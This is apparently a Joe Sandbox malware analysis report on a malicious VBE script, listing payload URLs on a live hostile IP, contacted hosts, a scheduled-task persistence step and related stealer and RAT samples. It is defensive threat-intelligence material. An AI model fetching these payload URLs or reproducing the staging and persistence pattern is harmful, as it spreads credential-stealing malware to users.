                          http://144.91.79.54/2412/swscript.exe, 00000000.00000003.2066491616.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048135478.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066662499.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2068419216.000002C0ECFC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2059672066.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2057456319.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066548889.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066965201.000002C0ECFC0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://account.dyn.com/MSBuild.exe, 00000005.00000002.3306974664.0000000000D92000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            http://144.91.79.54/2412/2wscript.exe, 00000000.00000003.2065886438.000002C0ED1E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066276747.000002C0ED1E8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54/2412/rwscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053401800.000002C0EB213000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056423470.000002C0EB213000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053643682.000002C0EB244000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053820937.000002C0EB244000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54/0Gwscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54/gYS0Gwscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54/ndexwscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54/Indexz=nwscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54/2412/regOwiR4EFZZGKetHoUY.txtPwscript.exe, 00000000.00000003.2067149458.000002C0EB249000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067480640.000002C0EB265000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066723786.000002C0EB249000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067435586.000002C0EB25E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067314001.000002C0EB256000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067352269.000002C0EB257000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://api.ipify.org/tMSBuild.exe, 00000005.00000002.3309367586.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://144.91.79.54:80/2412/cnwscript.exe, 00000000.00000003.2066723786.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067050019.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067149458.000002C0EB235000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2068007859.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.ipify.orgMSBuild.exe, 00000005.00000002.3309367586.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.3306974664.0000000000D92000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                http://144.91.79.54/?wscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54:80/2412/r4wscript.exe, 00000000.00000003.2066723786.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067050019.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067149458.000002C0EB235000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2068007859.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/ndexv=bwscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/2412/filewscript.exe, 00000000.00000003.2066491616.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066662499.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2068419216.000002C0ECFC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2059672066.000002C0ECFB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2059672066.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066548889.000002C0ECFBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066965201.000002C0ECFC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/2412/cnwscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/wscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54:80/2412/regOwiR4EFZZGKetHoUY.txtshqos.dllwscript.exe, 00000000.00000003.2066723786.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067050019.000002C0EB232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067149458.000002C0EB235000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2068007859.000002C0EB238000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/2412/vswscript.exe, 00000000.00000003.2053401800.000002C0EB213000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000005.00000002.3309367586.0000000002FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://144.91.79.54/2412/cnZ=Nwscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://144.91.79.54:80/2412/vJAwscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://144.91.79.54/2412/r.wscript.exe, 00000000.00000003.2053497527.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053348477.000002C0EB238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053788458.000002C0EB23A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://144.91.79.54/2412/regOwiR4EFZZGKetHoUY.txtwscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://144.91.79.54/hellwscript.exe, 00000000.00000003.2056025031.000002C0EB23B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  144.91.79.54
                                  		unknownGermany
                                  		51167CONTABODEtrue
                                  104.26.13.205
                                  		api.ipify.orgUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  162.254.34.31
                                  		unknownUnited States
                                  		64200VIVIDHOSTINGUStrue

                                  General Information

                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1591702
                                  Start date and time:2025-01-15 10:19:09 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 31s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:11
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:0969686.vbe
                                  Detection:MAL
                                  Classification:mal100.spre.troj.spyw.expl.evad.winVBE@9/12@1/3
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 57
                                  • Number of non-executed functions: 6
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 40.126.32.133, 40.126.32.136, 40.126.32.138, 20.190.160.14, 20.190.160.20, 40.126.32.76, 40.126.32.68, 40.126.32.72, 199.232.210.172, 2.23.77.188, 20.12.23.50, 40.69.42.241, 52.182.143.212, 20.3.187.198, 4.245.163.56, 13.107.246.45
                                  • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, e3913.cd.akamaiedge.net, otelrules.afd.azureedge.net, www.tm.lg.prod.aadmsa.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  04:20:00API Interceptor11x Sleep call for process: wscript.exe modified
                                  04:20:04API Interceptor42x Sleep call for process: powershell.exe modified
                                  04:20:09API Interceptor16x Sleep call for process: MSBuild.exe modified
                                  04:20:22API Interceptor1x Sleep call for process: wermgr.exe modified
                                  10:20:01Task SchedulerRun new task: uaDoJtHubxengYS path: C:\Users\user\AppData\Roaming\uaDoJtHubxengYS.vbs

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  144.91.79.54009.vbeGet hashmaliciousAgentTeslaBrowse
                                  • 144.91.79.54/2412/dl2xgIbUbOo3ZqLShxJX.txt
                                  Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                  • 144.91.79.54/1211/file
                                  Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                  • 144.91.79.54/1211/file
                                  BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                  • 144.91.79.54/1211/file
                                  Ref#2073306.vbeGet hashmaliciousMicroClipBrowse
                                  • 144.91.79.54/0911/file
                                  SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                  • 144.91.79.54/0911/file
                                  Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                  • 144.91.79.54/0911/file
                                  MV EAGLE EYE RFQ-92008882920-PDF.vbsGet hashmaliciousUnknownBrowse
                                  • 144.91.79.54/2210/file
                                  Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                  • 144.91.79.54/2210/file
                                  Chronopost_FormulaireAdresse.vbsGet hashmaliciousAsyncRATBrowse
                                  • 144.91.79.54/2210/file
                                  104.26.13.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                                  • api.ipify.org/
                                  lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                                  • api.ipify.org/
                                  Simple1.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • api.ipify.org/
                                  file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                  • api.ipify.org/
                                  file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                  • api.ipify.org/
                                  file.exeGet hashmaliciousRDPWrap ToolBrowse
                                  • api.ipify.org/
                                  Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                  • api.ipify.org/

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  s-part-0017.t-0009.t-msedge.netInquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                  • 13.107.246.45
                                  http://jfdhq.offerpeercheck.comGet hashmaliciousUnknownBrowse
                                  • 13.107.246.45
                                  T1#U5b89#U88c5#U53051.0.3.msiGet hashmaliciousUnknownBrowse
                                  • 13.107.246.45
                                  https://padlet.com/prowebsolutions488/new-message-jba6y6w7rg9tzzmnGet hashmaliciousHTMLPhisherBrowse
                                  • 13.107.246.45
                                  rRFQ_BIDLET-PO772917811_PROPOSL_BG_AD____PDF.exeGet hashmaliciousFormBookBrowse
                                  • 13.107.246.45
                                  xjljKPlxqO.dllGet hashmaliciousWannacryBrowse
                                  • 13.107.246.45
                                  GUtEaDsc9X.dllGet hashmaliciousWannacryBrowse
                                  • 13.107.246.45
                                  9kNjKSEUym.dllGet hashmaliciousWannacryBrowse
                                  • 13.107.246.45
                                  https://telegrams-tw.org/Get hashmaliciousUnknownBrowse
                                  • 13.107.246.45
                                  https://6y.tickarmoz.ru/aY57/Get hashmaliciousUnknownBrowse
                                  • 13.107.246.45
                                  bg.microsoft.map.fastly.net00.ps1Get hashmaliciousPureCrypter, LummaC, LummaC StealerBrowse
                                  • 199.232.210.172
                                  31070304561863532281.jsGet hashmaliciousStrela DownloaderBrowse
                                  • 199.232.210.172
                                  Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                  • 199.232.214.172
                                  new.batGet hashmaliciousUnknownBrowse
                                  • 199.232.214.172
                                  2387315401298627745.jsGet hashmaliciousStrela DownloaderBrowse
                                  • 199.232.214.172
                                  92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                  • 199.232.210.172
                                  1475127682155276.jsGet hashmaliciousStrela DownloaderBrowse
                                  • 199.232.210.172
                                  Invdoc80.pdfGet hashmaliciousHTMLPhisherBrowse
                                  • 199.232.210.172
                                  Reversed order 24-25.pdfGet hashmaliciousUnknownBrowse
                                  • 199.232.210.172
                                  wmnq39xe8J.dllGet hashmaliciousWannacryBrowse
                                  • 199.232.214.172
                                  api.ipify.orgNEW SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  new order.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                  • 104.26.12.205
                                  http://loginmicrosoftonline.al-mutaheda.com/expiration/notice/nRrRc/receiving@accel-inc.comGet hashmaliciousHTMLPhisherBrowse
                                  • 104.26.12.205
                                  Employee_Salary_Update.docxGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                  • 104.26.13.205
                                  https://www.explorium.ai/notice-of-processing-for-eu-residents/?email=fabrice.duval@socotec.comGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  https://www.explorium.ai/notice-of-processing-for-eu-residents/?email=fabrice.duval@socotec.comGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  VRO.exeGet hashmaliciousUnknownBrowse
                                  • 172.67.74.152
                                  mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                  • 104.26.13.205

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUSbuilded.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                  • 104.21.77.174
                                  Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                  • 104.16.184.241
                                  https://www.google.com/url?q=https://newinvite.es/zoom&source=gmail&ust=1736277206672000&usg=AOvVaw1tMcQvXWpd-idsJybr3xOAGet hashmaliciousScreenConnect ToolBrowse
                                  • 104.21.64.1
                                  https://www.google.com/url?q=https://newinvite.es/zoom&source=gmail&ust=1736277206672000&usg=AOvVaw1tMcQvXWpd-idsJybr3xOAGet hashmaliciousScreenConnect ToolBrowse
                                  • 104.21.112.1
                                  http://arthistoryteachingresources.org/2015/02/talk-to-your-profbut-how/Get hashmaliciousUnknownBrowse
                                  • 188.114.97.3
                                  Contrarre.exeGet hashmaliciousMassLogger RATBrowse
                                  • 104.21.96.1
                                  17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                  • 104.16.185.241
                                  http://jfdhq.offerpeercheck.comGet hashmaliciousUnknownBrowse
                                  • 1.1.1.1
                                  NEW SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 104.21.48.1
                                  VIVIDHOSTINGUSspc.elfGet hashmaliciousUnknownBrowse
                                  • 216.157.141.83
                                  meth15.elfGet hashmaliciousMiraiBrowse
                                  • 64.190.116.33
                                  50201668.exeGet hashmaliciousMassLogger RATBrowse
                                  • 162.254.34.31
                                  009.vbeGet hashmaliciousAgentTeslaBrowse
                                  • 162.254.34.31
                                  rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                  • 162.254.34.31
                                  rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                  • 162.254.34.31
                                  VYLigyTDuW.exeGet hashmaliciousAgentTeslaBrowse
                                  • 162.254.34.31
                                  Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                  • 162.254.34.31
                                  Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                  • 162.254.34.31
                                  arm4.elfGet hashmaliciousMiraiBrowse
                                  • 192.154.238.20
                                  CONTABODE009.vbeGet hashmaliciousAgentTeslaBrowse
                                  • 144.91.79.54
                                  trow.exeGet hashmaliciousUnknownBrowse
                                  • 5.189.128.121
                                  17366735083ba4993c0ae9322c32aacf9286de757a918f634b522467c19ad3da2352651d39438.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                  • 213.136.81.72
                                  8L6MBxaJ2m.exeGet hashmaliciousFormBookBrowse
                                  • 161.97.142.144
                                  fqbVL4XxCr.exeGet hashmaliciousFormBookBrowse
                                  • 161.97.142.144
                                  plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                  • 161.97.142.144
                                  1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                  • 161.97.142.144
                                  uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                  • 161.97.142.144
                                  5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                  • 161.97.142.144
                                  0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                  • 161.97.142.144

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eInquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                  • 104.26.13.205
                                  17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                  • 104.26.13.205
                                  NEW SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 104.26.13.205
                                  new order.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 104.26.13.205
                                  NLWfV87ouS.dllGet hashmaliciousWannacryBrowse
                                  • 104.26.13.205
                                  542CxvZnI5.dllGet hashmaliciousVirut, WannacryBrowse
                                  • 104.26.13.205
                                  https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                  • 104.26.13.205
                                  https://ziyahid.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                  • 104.26.13.205

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_2268e00b-0190-4843-9f60-f9bf7b44562f\Report.wer

                                  Download File
                                  Process:C:\Windows\System32\wermgr.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.5344064391763494
                                  Encrypted:false
                                  SSDEEP:96:DkFCvjErxYid4RH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAVf/VXT5NHBx:YIEmG4R30wAAzuiFFZ24lO8
                                  MD5:2AFE0DF777A02D24C31401C6953B099D
                                  SHA1:F2B59DFDF1BDF51B7D725FEA42DA3BBD3B91FE2F
                                  SHA-256:ADF4C281894EEEB52CAF6D09B45A8644ACAA76D9DFC145DEA5C8E896B4B1377E
                                  SHA-512:B7F78C07CBD0571E88C5D0AF6BC02BD279EE1E3132D5E61A157D13832C146404BDC3D7629273C01C365C330567586851AA7099C2A7CAE52831DF6278843FE383
                                  Malicious:false
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.0.6.6.2.6.6.9.3.9.8.7.2.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.0.6.4.0.8.3.2.5.4.4.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.6.8.e.0.0.b.-.0.1.9.0.-.4.8.4.3.-.9.f.6.0.-.f.9.b.f.7.b.4.4.5.6.2.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.7.c.-.0.0.0.1.-.0.0.1.4.-.c.e.6.1.-.f.0.a.7.2.e.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D48.tmp.WERInternalMetadata.xml

                                  Download File
                                  Process:C:\Windows\System32\wermgr.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):7414
                                  Entropy (8bit):3.6826926929513317
                                  Encrypted:false
                                  SSDEEP:96:RSIU6o7wVetbXKf6lvu6YWnBMgmfHNV9rexP45aM4Zzm:R6l7wVeJXKf6tu6YWnqgmftqKpKzm
                                  MD5:D65A74C5B788F343623EB953CEF00ED8
                                  SHA1:851093F1C854955E0B1D203D51EE6378848F61D7
                                  SHA-256:61915561F3C8AA693E3A958DAE46675812084F37DF3AD02C0C141505F6C39512
                                  SHA-512:3A0E1BBEEE3E2182663374DE76F79E0E8DEC2BF6C06399E5E40F587C4AF6D1DA4119FF699541539A5313FAD32F9824A9E3B966CF7AAC4F5142314A93242FA21D
